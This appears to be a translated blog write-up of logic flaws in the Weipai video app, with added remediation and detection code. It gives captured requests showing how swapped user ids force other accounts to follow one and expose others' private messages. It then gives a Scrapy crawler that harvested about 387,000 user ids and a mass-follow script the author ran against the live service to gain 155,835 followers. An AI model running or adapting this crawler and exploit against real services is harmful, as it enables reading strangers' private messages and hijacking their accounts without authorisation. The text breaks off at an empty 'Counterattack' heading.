Weipai ("Micro-shot") APP Vulnerabilities, from Scratch
Weipai ("micro-shot") is the most popular mobile video social APP on the mobile Internet. It has distinctive video effects such as skin whitening, ranks near the top of the social and photography categories in the APP stores for iPhone and Android phones, and is the main mobile product of Beijing Yunxiao Online Technology Co., Ltd. The word also names a photographic technique: picking out the centre, focus, distinctive features, strengths or other prominent aspects of a subject and enlarging or extending them, recorded as images.
Weipai sees a large number of "Bai fumei" (pretty, well-off young women) self-timer videos published every day, and its user count once climbed to several million. How does a new user get any attention at all?
1. Vulnerability details
Once the APP is installed on the phone you can immediately see videos of every kind; that is not the point, of course. After setting the phone's network proxy to my computer, I captured the APP's traffic. Trying the usual common vulnerabilities did not get far, so I turned to logic vulnerabilities instead. Watching what happens when you follow a user, the APP sends a POST request like this:
POST /follow_user HTTP/1.1
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
Host: w1.weipai.cn
Connection: Keep-Alive
User-Agent: android-async-http/1.4.1 (weipaipro)
Accept-Encoding: gzip
Phone-Type: android_2013022_4.2.1
os: android
Channel: (
App-Name: weipai
Api-Version: 8
Client-Version: 0.99.9.2
Device-Uuid: 9609b1be908****e9beb5442166c7bdfd1ad2e22
Weipai-Token: 54ba****7373c
Weipai-UserId: 54ba1650a5640b57078b****
Phone-Number:
Push-Id: com.weipai.weipaipro
Kernel-Version: 15
Com-Id: weipai

to_user_id=54ba1650a5640b57078b****&from_user_id=53c299e79d67d962598b****&type=add
Here to_user_id is my own account's user_id and from_user_id is the user_id of the user being followed. Swapping the two makes the other party follow a user of your choosing. That is the first logic vulnerability.
In addition, this APP has one very core function: conversation. Oh, not conversation: messaging. Every few minutes the APP sends a request to the server so that new messages show up promptly:
GET /pm/new?count=20&weipai_userid=54ba1650a5640b57078b**** HTTP/1.1
Host: pm.weipai.cn
Connection: Keep-Alive
User-Agent: android-async-http/1.4.1 (weipaipro)
Accept-Encoding: gzip
Phone-Type: android_2013022_4.2.1
os: android
Channel: (
App-Name: weipai
Api-Version: 8
Client-Version: 0.99.9.2
Replace weipai_userid in this GET request with another user's ID and the server returns the other party's conversation, oh no, their message history.
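Both requests share one root cause: the server believes a client-supplied identity (from_user_id in the POST body, weipai_userid in the query string) instead of the identity proven by the Weipai-Token header. The following is an added example, not code from the original write-up or from Weipai, of the server-side check that closes both holes: the acting user is looked up from the session behind the token, and whatever identity the client claims must match it. It assumes that from_user_id is the account that does the following (the way the exploit script later on this page uses it), that pm.weipai.cn receives the same Weipai-Token header as w1.weipai.cn (the captured GET is cut off before that header), and the session table, tokens and user ids are constructed for the example.

```python
# Added example, not code from the original write-up: a server-side identity
# check that stops both logic vulnerabilities above. The acting user comes from
# the session behind Weipai-Token; any client-supplied "who am I" parameter is
# compared against it rather than trusted. Assumptions: from_user_id is the
# account doing the following (as the exploit script uses it), pm.weipai.cn
# receives the same Weipai-Token header, and the session table, tokens and
# user ids below are constructed for the example.
from urllib.parse import parse_qs, urlsplit

# Constructed session store: token -> authenticated user_id.
SESSIONS = {
    "tok-alice": "user_alice",
    "tok-bob": "user_bob",
}

# Per route: where the client states its own identity (form body or query
# string) and under which parameter name. Assumed from the captured requests.
ACTOR_PARAM = {
    ("POST", "/follow_user"): ("form", "from_user_id"),
    ("GET", "/pm/new"): ("query", "weipai_userid"),
}


def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, path, query, headers and form body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    form = {k: v[0] for k, v in parse_qs(body).items()}
    return method, parts.path, query, headers, form


def authorize(raw_request, sessions=SESSIONS):
    """Return (http_status, session_user). 200 only when the identity the client
    claims in the request equals the identity proven by its token."""
    method, path, query, headers, form = parse_http_request(raw_request)
    actor = sessions.get(headers.get("weipai-token", ""))
    if actor is None:
        return 401, None                      # missing or unknown token
    route = ACTOR_PARAM.get((method, path))
    if route is None:
        return 404, actor
    source, name = route
    claimed = (form if source == "form" else query).get(name)
    if claimed != actor:
        return 403, actor                     # swapped ids / another user's mailbox
    return 200, actor


def make_follow_request(token, from_user_id, to_user_id):
    """Constructed request in the shape of the captured POST /follow_user."""
    body = f"to_user_id={to_user_id}&from_user_id={from_user_id}&type=add"
    return (
        "POST /follow_user HTTP/1.1\r\n"
        "Host: w1.weipai.cn\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n"
        f"Weipai-Token: {token}\r\n"
        "\r\n" + body
    )


def make_pm_request(token, weipai_userid):
    """Constructed request in the shape of the captured GET /pm/new."""
    return (
        f"GET /pm/new?count=20&weipai_userid={weipai_userid} HTTP/1.1\r\n"
        "Host: pm.weipai.cn\r\n"
        f"Weipai-Token: {token}\r\n"
        "\r\n"
    )


if __name__ == "__main__":
    # alice follows bob: allowed; alice claims to be bob: rejected
    print(authorize(make_follow_request("tok-alice", "user_alice", "user_bob")))
    print(authorize(make_follow_request("tok-alice", "user_bob", "user_alice")))
    # alice asks for bob's message history: rejected
    print(authorize(make_pm_request("tok-alice", "user_bob")))
```

The stricter fix is to drop the identity parameters from the API entirely and use the session's user_id for everything; the comparison form above keeps the client protocol unchanged while old clients are still in the field, and every 403 it produces is a ready-made signal that someone is tampering with ids.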
2. Crawler assistance
Whether it is the first "follower-farming vulnerability" or the "arbitrary message-reading vulnerability", both presuppose that we have the target user's weipai_userid; without it, "follow" and "arbitrary" are empty talk. JUST DO IT
We found this API, a GET request that returns a user's fan list:
http://w1.weipai.cn/user_fans_list?count=20&relative=after&uid=50f8ff597f3494a70200****
For the crawler we use Scrapy, with one random user_id as the seed, and crawl fan lists one after another:
#!/usr/bin/env python
# coding=utf-8
# author=f

import scrapy
import json
from weipai.items import WeipaiItem


class weipai_spider(scrapy.Spider):
    # spider name added so it matches the output file weipai_spider_user_id.json;
    # allowed_domains was misspelled and must hold a host name, not a URL
    name = "weipai_spider"
    allowed_domains = ["w1.weipai.cn"]
    # seed: one user_id, with the page size raised from the app's 20 to 1000
    start_urls = ["http://w1.weipai.cn/user_fans_list?count=1000&relative=after&uid=50f8ff597f3494a702000066"]
    uid_list = []

    def parse(self, response):
        all_data = json.loads(response.body)
        for user in all_data['user_list']:
            try:
                if user['user_id'] not in self.uid_list:
                    self.uid_list.append(user['user_id'])
                    # one fresh item per user: reusing a single item object
                    # across yields hands the pipeline the same mutated dict
                    item = WeipaiItem()
                    item['user_id'] = user['user_id']
                    item['url'] = "http://w1.weipai.cn/user_fans_list?count=1000&relative=after&uid=%s" % user['user_id']
                    yield item
                    # queue this user's own fan list as the next page to crawl
                    yield self.make_requests_from_url(item['url'])
            except Exception:
                pass
We have now crawled 400,000 user_ids:
weipai $ wc weipai_spider_user_id.json
 387451  387451 8186275 weipai_spider_user_id.json
That is enough users (a user_id list in which Bai fumei and diaosi, the pretty rich girls and the loser guys, sit side by side) to prepare the counterattack.
3. Vulnerability Exploitation
With the vulnerabilities and the user list in hand, we take the first step of the counterattack: farming the follower count to the top. For that we need a script:
#!/usr/bin/env python
# coding=utf8
# author=evi1m0@2015

import requests
import threadpool as tp

# one crawled user_id per line
f_user = open('./weipai.txt', 'r')
post_url = 'http://w1.weipai.cn/follow_user'


def start(test):
    flag = 0
    for user in f_user.readlines():
        # to_user_id is the author's own (masked) account; from_user_id is the
        # crawled account that is made to follow it. Note that the script sends
        # no Weipai-Token header at all.
        post_data = {
            'to_user_id': '54ba1650a5640b57078b****',
            'from_user_id': user[:-1],
            'type': 'add',
        }
        try:
            req = requests.post(post_url, data=post_data, timeout=5)
            flag += 1
            print '[+] %d : %s' % (flag, req.text)
        except:
            continue


# a single work item, so the 200-thread pool only ever runs one worker
args = [
    ['http://xxx.com', 'test'],
]
pool = tp.ThreadPool(200)
reqs = tp.makeRequests(start, args)
[pool.putRequest(req) for req in reqs]
pool.wait()
Running the script was easy, but watching it for a while showed it was not very fast. So I put the script on several servers in Hong Kong and abroad, split the user_id list into several parts, and went to sleep.
Soon I woke up, and no beauties had appeared in my dreams. I logged on to the servers and stopped the scripts. Picking up the Android phone, which had not stopped vibrating, I found hundreds of new conversations and, of course, a follower count that had reached 155,835.
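Both halves of this procedure leave a clear trace in the service's access logs: the crawler walks /user_fans_list with a new uid on every request and a page size of 1000 where the app itself asks for 20, and the follow run makes one to_user_id gain followers from hundreds of distinct from_user_id values in minutes, spread over a handful of source addresses. The following is an added example, not code from the original write-up, of detection logic for those two patterns run over constructed log lines; the log format, IP addresses, ids and thresholds are assumptions, and only the endpoints and parameter names come from the requests shown on this page.

```python
# Added example, not code from the original write-up: detection rules for the
# fan-list enumeration and the mass-follow run described above, evaluated over
# constructed access-log lines. Log format, IPs, ids and thresholds are
# assumptions; the endpoints and parameter names are from the captured requests.
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed log format: <ts> <client_ip> "<METHOD> <target>" <status> [body="..."]
LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<ip>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" '
    r'(?P<status>\d{3})(?: body="(?P<body>[^"]*)")?$'
)


def parse_line(line):
    """Return ip, method, path, query and form parameters, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    return {
        "ip": m.group("ip"),
        "method": m.group("method"),
        "path": parts.path,
        "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
        "form": {k: v[0] for k, v in parse_qs(m.group("body") or "").items()},
    }


def detect_fan_list_enumeration(lines, max_distinct_uids=50, normal_count=20):
    """Flag client IPs that walk /user_fans_list across many distinct uids, or
    request more entries per page than the app itself ever asks for (20)."""
    uids_by_ip = defaultdict(set)
    oversized = set()
    for rec in filter(None, map(parse_line, lines)):
        if rec["path"] != "/user_fans_list":
            continue
        uids_by_ip[rec["ip"]].add(rec["query"].get("uid"))
        if int(rec["query"].get("count", "0")) > normal_count:
            oversized.add(rec["ip"])
    enumerating = {ip for ip, uids in uids_by_ip.items() if len(uids) > max_distinct_uids}
    return sorted(enumerating | oversized)


def detect_follow_flood(lines, max_new_followers=100):
    """Flag to_user_id values gaining followers from an unusually large number
    of distinct from_user_id values: the signature of the mass-follow script."""
    followers = defaultdict(set)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"] == "/follow_user" \
                and rec["form"].get("type") == "add":
            followers[rec["form"]["to_user_id"]].add(rec["form"]["from_user_id"])
    return {uid: len(f) for uid, f in followers.items() if len(f) > max_new_followers}


def build_sample_log():
    """Constructed traffic: one crawler, one mass-follow run, some normal use."""
    lines = []
    # a normal user paging through a friend's fan list with the app's count=20
    for i in range(3):
        lines.append(f'2015-02-01T10:00:{i:02d}Z 198.51.100.5 '
                     f'"GET /user_fans_list?count=20&relative=after&uid=uid_friend" 200')
    # crawler: count=1000 and a new uid on every request, all from one address
    for i in range(60):
        lines.append(f'2015-02-01T11:00:{i:02d}Z 203.0.113.9 '
                     f'"GET /user_fans_list?count=1000&relative=after&uid=uid_{i:05d}" 200')
    # an ordinary follow
    lines.append('2015-02-01T12:00:00Z 198.51.100.5 "POST /follow_user" 200 '
                 'body="to_user_id=uid_friend&from_user_id=uid_me&type=add"')
    # mass-follow: 150 different accounts made to follow one target, from 3 servers
    servers = ["203.0.113.9", "203.0.113.10", "203.0.113.11"]
    for i in range(150):
        lines.append(f'2015-02-01T13:{i // 60:02d}:{i % 60:02d}Z {servers[i % 3]} '
                     f'"POST /follow_user" 200 '
                     f'body="to_user_id=uid_target&from_user_id=uid_{i:05d}&type=add"')
    return lines


SAMPLE_LOG = build_sample_log()

if __name__ == "__main__":
    print("enumerating clients:", detect_fan_list_enumeration(SAMPLE_LOG))
    print("follow floods:", detect_follow_flood(SAMPLE_LOG))
```

The follow-flood rule keys on the target rather than the source address on purpose: the write-up spreads the script over several servers, so a per-IP rate limit alone would miss it, while the count of distinct new followers per target is the same however many machines send the requests.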
4. Counterattack